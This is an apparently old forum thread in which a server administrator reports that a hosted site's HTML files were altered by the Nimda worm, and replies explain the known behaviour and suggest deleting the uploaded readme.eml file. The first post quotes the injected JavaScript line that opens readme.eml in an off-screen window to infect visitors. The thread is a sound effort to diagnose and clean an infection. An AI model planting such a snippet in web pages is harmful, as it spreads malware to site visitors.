Has anyone else ever seen this? We have a site on a Cobalt Raq that looks like it was uploaded by a Windows user who was/is infected with the Nimda virus. I'm not sure what HTML editor they are using but here is what it looks like the virus did.

1) It added this line of code to the bottom of every .html file:

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

2) it uploaded the readme.eml to the sites DocumentRoot.

Then you go to the sight, and the virus tries to sperad just like it does on infected Windows servers.

Norton caught it and labled it:

"W32.Nimda.A@mm(html) virus"


The site is has a lot of Flash and javaScript.

I guess my question is, is this something new? Is the virus actually aiming towards the HTML editor programs now also?

I know the actual server is not going to be harmed, so please no "Don't woory about it, Linux is not affected..." responses :D

This is a know issue with Nimda. Once a server get infected (or infected files get uploaded to a Non-Windows system), it tries to infect web visitors by running that email which contains the virus.

Your best bet is to find "readme.eml" on the server and delete that file, then inform the customer of the "NO NO" they have done :)

Hope that helps!

Talk to the person responsible for the content (and please tell us what you find out).

I don't know much about this aspect of Nimda, but my guess is that he/she is running a local web server (IIS or PWS) on his web development workstation, and that was how the HTML files got "infected".

I'm going to contact the sites webmaster and see what I can find out, then post it here. The main thing that gets me is how the readme.eml made it to the server and why only 13 of the 20+ .html files that were uploaded at that time had the Java Script call. The webmaster could have just uploaded all the files from a certin directory and acidently uploaded the .eml but I'm gonna try to find out for sure.

Thanks